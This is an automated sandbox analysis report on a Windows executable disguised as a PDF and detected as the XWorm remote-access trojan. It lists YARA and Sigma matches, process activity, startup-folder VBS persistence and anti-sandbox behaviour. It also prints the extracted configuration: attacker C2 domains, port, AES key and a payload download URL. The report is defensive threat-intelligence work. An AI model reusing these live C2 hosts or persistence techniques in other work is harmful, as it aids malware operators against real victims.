Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FFDOC-2025210 pdf.exe

Overview

General Information

Sample name:FFDOC-2025210 pdf.exe
Analysis ID:1628887
MD5:d8ea07f0f0072e6ae8ac3b7996941eb7
SHA1:24a6d36259ca0d0c89f46411da822a7f2683beaf
SHA256:6857d59d1179d9e3745115f7e08cde964c3cee54bb91fd891bba282fe226eb2b
Tags:exeHUNuser-smica83
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FFDOC-2025210 pdf.exe (PID: 2276 cmdline: "C:\Users\user\Desktop\FFDOC-2025210 pdf.exe" MD5: D8EA07F0F0072E6AE8AC3B7996941EB7)
    • FFDOC-2025210 pdf.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\FFDOC-2025210 pdf.exe" MD5: D8EA07F0F0072E6AE8AC3B7996941EB7)
      • WerFault.exe (PID: 1996 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e41:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6b01:$cnc4: POST / HTTP/1.1
    00000000.00000002.2211197275.0000000005710000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x1e65b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1e6f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1e80d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1e4cd:$cnc4: POST / HTTP/1.1
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.FFDOC-2025210 pdf.exe.5710000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          2.2.FFDOC-2025210 pdf.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            2.2.FFDOC-2025210 pdf.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x59e5:$str01: $VB$Local_Port
            • 0x59d6:$str02: $VB$Local_Host
            • 0x5ce6:$str03: get_Jpeg
            • 0x568e:$str04: get_ServicePack
            • 0x673b:$str05: Select * from AntivirusProduct
            • 0x6939:$str06: PCRestart
            • 0x694d:$str07: shutdown.exe /f /r /t 0
            • 0x69ff:$str08: StopReport
            • 0x69d5:$str09: StopDDos
            • 0x6ad7:$str10: sendPlugin
            • 0x6b57:$str11: OfflineKeylogger Not Enabled
            • 0x6cbd:$str12: -ExecutionPolicy Bypass -File "
            • 0x6de6:$str13: Content-length: 5235
            2.2.FFDOC-2025210 pdf.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6e8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6f2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7041:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6d01:$cnc4: POST / HTTP/1.1
            0.2.FFDOC-2025210 pdf.exe.25716e4.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 6 entries

              Sigma Signatures

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\FFDOC-2025210 pdf.exe, ProcessId: 2276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Current.exeReversingLabs: Detection: 31%
              Multi AV Scanner detection for submitted file
              Source: FFDOC-2025210 pdf.exeVirustotal: Detection: 31%Perma Link
              Source: FFDOC-2025210 pdf.exeReversingLabs: Detection: 31%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Sample uses string decryption to hide its real strings
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: bin12.ydns.eu,bin14.ydns.eu,kingsbkup1.ydns.eu,smfcs1.ydns.eu,smfcs3.ydns.eu
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 4050
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <123456789>
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <Xwormmm>
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: DOGGY XWORM
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: USB.exe
              Source: FFDOC-2025210 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: FFDOC-2025210 pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E17000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211789511.0000000005960000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003441000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdbC source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211789511.0000000005960000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003441000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: n,C:\Windows\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310194259.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Desktop\FFDOC-2025210 pdf.PDB source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E44000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310432392.0000000000E02000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ##.pdb source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310194259.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\FFDOC-2025210 pdf.PDB source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310194259.00000000009E8000.00000004.00000010.00020000.00000000.sdmp

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: bin12.ydns.eu
              Source: Malware configuration extractorURLs: bin14.ydns.eu
              Source: Malware configuration extractorURLs: kingsbkup1.ydns.eu
              Source: Malware configuration extractorURLs: smfcs1.ydns.eu
              Source: Malware configuration extractorURLs: smfcs3.ydns.eu
              Source: global trafficHTTP traffic detected: GET /never/lookinto/it/panel/uploads/Ptcugze.mp3 HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /never/lookinto/it/panel/uploads/Ptcugze.mp3 HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: win32.ydns.eu
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win32.ydns.eu
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp3
              Source: FFDOC-2025210 pdf.exe, Current.exe.0.drString found in binary or memory: http://win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp31vmo/
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmp, FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.2.FFDOC-2025210 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 2.2.FFDOC-2025210 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_008718120_2_00871812
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_0087C2A00_2_0087C2A0
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_0087242E0_2_0087242E
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_0087C8280_2_0087C828
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_00871A180_2_00871A18
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_0605FBB00_2_0605FBB0
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_0605E6400_2_0605E640
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_060400280_2_06040028
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 0_2_060400400_2_06040040
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeCode function: 2_2_00F80B922_2_00F80B92
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 932
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211571183.0000000005900000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000000.2053548921.00000000000F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDOGGYP10.exe2 vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.000000000245E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2209660953.0000000005200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTkrqekoms.dll" vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2211789511.0000000005960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2191921291.000000000088E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2208202018.0000000003441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDOGGYP10.exe2 vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000000.00000002.2192389813.00000000027DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exe, 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exeBinary or memory string: OriginalFilenameDOGGYP10.exe2 vs FFDOC-2025210 pdf.exe
              Source: FFDOC-2025210 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 2.2.FFDOC-2025210 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 2.2.FFDOC-2025210 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000002.00000002.3310045427.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2192389813.0000000002732000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2192389813.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: FFDOC-2025210 pdf.exe, GenericSorter.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.FFDOC-2025210 pdf.exe.348fd10.2.raw.unpack, GenericSorter.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.FFDOC-2025210 pdf.exe.25716e4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.FFDOC-2025210 pdf.exe.5960000.12.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@4/3@1/1
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMutant created: NULL
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeMutant created: \Sessions\1\BaseNamedObjects\56TvElZMbqDoRvU7
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:64:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1a4215e5-81f5-4ed3-8e8b-ddb2bbcbfc30Jump to behavior
              Source: FFDOC-2025210 pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: FFDOC-2025210 pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: FFDOC-2025210 pdf.exeVirustotal: Detection: 31%
              Source: FFDOC-2025210 pdf.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeFile read: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\FFDOC-2025210 pdf.exe "C:\Users\user\Desktop\FFDOC-2025210 pdf.exe"
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess created: C:\Users\user\Desktop\FFDOC-2025210 pdf.exe "C:\Users\user\Desktop\FFDOC-2025210 pdf.exe"
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 932
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeProcess created: C:\Users\user\Desktop\FFDOC-2025210 pdf.exe "C:\Users\user\Desktop\FFDOC-2025210 pdf.exe"Jump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\FFDOC-2025210 pdf.exeSection loaded: rsaenh.dllJump to behavior
